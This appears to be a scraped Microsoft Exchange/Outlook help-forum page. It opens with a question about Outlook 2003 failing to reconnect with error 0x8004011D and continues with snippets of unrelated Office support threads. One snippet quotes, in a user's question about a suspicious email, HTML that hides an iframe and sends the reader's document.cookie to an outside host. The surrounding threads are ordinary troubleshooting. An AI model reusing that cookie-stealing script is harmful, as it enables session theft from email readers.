Exchange 2003 /w W2k3, Outlook fails to reconnect randomly

Hi,

Outlook 2003 fails to reconnect randomly to Exchange 2003 Enterprise
Server, OWA works well. After authenthication failure Outlook falls to
offline and further attempts to Send and Receive on Outlook produce
error 0x8004011D. Does anyone have similar problems?

--
htp

0
hannupy (1)

Exchange Cluster

MDE in Access 2003
My office is the process of upgrading all users to Office 2003 from Office XP. I've encountered a problem that when I've edited a database created with Access 2002, and create an MDE file, those users still in Office XP cannot open the MDE file. They receive an error that says something like "file is incorrect format." (And I have to edit all existing databases...Access 2003 shows a missing reference to web components that impedes the database from executing formulas and it gives an error message. In order to check-off the missing reference, I have to open the data...

Exchange

outlook express 6 (no pics in outgoing mail)
I have outlook express 6. I used to have no problem sending pictures in email. Recently, they simply won't go. I have checked all the settings, at least the ones I know of, to no avail. I've gone to the HTML setting and set it to "send pictures". I still, however, get only a box with the picture name on all outgoing mail. Incoming has all pictures as they should be and I can send .jpg's as attachments. Nothing included in the body of the mail works. Any help would be greatly appreciated!! "bill a" <anonymous@discussions.microsoft.com> wrote in messa...

Cannot Unistall IMF Exchange 2003

2003: Desktop alerts on IMAP messages?
Sometimes I think I'm dating an airhead, because everytime I go out with Microsoft, she looks more beautiful than ever, but at heart she's still a bubble- gum chewing ditz. So it is with Outlook 2003 My work email uses an IMAP server, but Outlook won't let me get desktop alerts on my IMAP folder. It says that it can only do this for the default inbox (and I can't get my IMAP folder to become the default inbox). So, I've been ignoring the default inbox and using the IMAP folder without alerts. I can change the freaking transparency of the alerts, but I can't...

Exchange / POP3

Backing Up emails and contacts in outlook 2002
I have had to reformat my computer and have lost all contacts and emails. It is extremely important that this information is retained for my business. How can I back the entire file so that this doesn't happen again. Signed, sincerely upset. Search for .pst files at your hard disk (it may be hidden or in a hidden directory) and save the file. You can at any time open it in Outlook using file/open. Thomas Quester www.outlookfolders.de "Deborah" <anonymous@discussions.microsoft.com> schrieb im Newsbeitrag news:5efd01c42dcd$75212ab0$a101280a@phx.gbl... >I have...

virus attacks against Exchange

Prob w/OL 2002 Pers Addr Bk
I recently added entries to my Personal Address Book in Outlook XP. Now everytime I try to use them by opening a new message and pressing the "TO" button to select from the list, it goes along just fine until I send the email. Then I get an email from System Administrator that says Undeliverable and "Your message did not reach some or all of the intended recipients." Then a list of all the addresses I tried to send to. I have tried selecting different addresses, but nothing I've tried seems to work. Any ideas?? TIA Melissa ...

format numbers with no decimals Excel 2003
I need to display invoice number eg: 145 but i can't seem to get the format cells to work. It keeps rounding it off to a 1 or displays as 1.45. i just upgraded to Excel 2003 my older verison woudl let me do this. Hi just use a format such as 0 "3 digit nubmers with no decimals" wrote: > I need to display invoice number eg: 145 but i can't seem to get the format > cells to work. It keeps rounding it off to a 1 or displays as 1.45. i just > upgraded to Excel 2003 my older verison woudl let me do this. The "0" will not work. it dispalys as a 1 not 145....

Exchange 2003 #5

Is this an exploit that will do anything in Outlook?
Folks- One of my users got an e-mail message from a Yahoo user; the message had the following very interesting HTML code at the end ... <DIV id=a> </DIV> <DIV id=b style="VISIBILITY: hidden"></DIV> <STYLE onload="window.status=''; var x = escape(document.cookie).substr(0,1900) ; b.innerHTML='<iframe src=http://yahoo.game-host.org:1646/index.php?id='+document.title.substring(document.title.indexOf('-')+2)+'&amp;cookie=\''+x+'\' frameborder=0 width=10 height=10></iframe>test'; " type=...

Intermediate Excel 2003
Can anyone suggest a good book to improve my Excel Skills. I have a reasonable understanding of the main functions and basic formula creation but I wish to develop things a little further? Many thanks in anticipation of any suggestions. Roger Lots of suggestions at: http://www.contextures.com/xlbooks.html best wishes -- Bernard V Liengme Microsoft Excel MVP www.stfx.ca/people/bliengme remove caps from email "roger lewis" <rogerlewis@ntlworld.com> wrote in message news:a4k3j.1531$WJ3.154@newsfe4-gui.ntli.net... > Can anyone suggest a good book to improve my Excel ...

Linking Visio 2003 Professional to Access 2003 Professional
I know there's a way to do this because I saw it somewhere and now cannot find the site. So, for work I have an Access database that has numerous tables and field. Basically it's a mock-up for an Asset Management System so we have information on Pritners, Workstations, PDAs, etc. What I want to do is pull the information from the database into a infrastructure diagram in Visio to show how everything connects and changes. I also want it to display the various information about each item (serial number, asset number, name, type, etc.). Any help would be appreciated. you might che...

Microsoft Exchange #3

Exchange-Integrated Help Desk Software

Automatic Outlook and Outlook express Configuration
Hello, I am looking for a script or an exe file that will ask the users their username, domain, and the email program they are using, delete the old configuration and configure their outlook/outlook express accounts automatically. The scripts I found do not change the incoming and outgoing mail ports (since we use gmail I need to change them). Do you know of any script, .exe file that I can send the users to configure their own accounts? Thank you in advance. Ozgur Ozdemircili ...

recover mails from .bak file in ms outlook
Dear All I had some problem with MS Outlook (2003). I found that there was a problem with .PST file I tried to repair it with SCANPST.EXE. It repaired my OUTLOOK.PST file but many mails are missing. I had taken bakup of .PST file into .BAK file. Please guide me how can in recover my mails from .BAK file Thanks Vimal -- vimalrupera If you have a backup copy of your pst and you recover it, then you may well find the problem is also recovered. What format is your pst file? - If your pst is open in Outlook, select properties of the personal folders, Advanced, what is sh...

exchange 5.5 to exchange 2000

OUT LOOK 2003
How do I transfer all my info from my Out Look 2003 in my computer to a other computer Out Look 2003 that I use.? H2O On Wed, 20 Feb 2008 18:54:04 -0800, H20 <H20@discussions.microsoft.com> wrote: >How do I transfer all my info from my Out Look 2003 in my computer to a other >computer Out Look 2003 that I use.? > >H2O You may want to post your question in a forum supporting Outlook. This newsgroup is for a different program, Microsoft Access. The Microsoft webpage is sometimes confusing and may have misled you - scroll down the list of subjects and find one for Outloo...

Problems between two Exchange Servers